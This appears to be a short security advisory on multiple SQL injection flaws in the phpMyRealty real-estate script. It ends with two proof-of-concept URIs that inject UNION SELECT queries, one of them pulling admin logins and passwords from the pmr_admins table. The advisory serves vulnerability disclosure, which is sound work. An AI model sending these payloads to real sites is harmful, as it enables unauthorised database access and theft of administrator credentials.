• info
• discussion
• exploit
• solution
• references

phpMyRealty Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available for these issues:

http://www.example.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_admins
http://www.example.com/admin/findlistings.php?listing_updated=YES&listing_updated_days=1)+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/*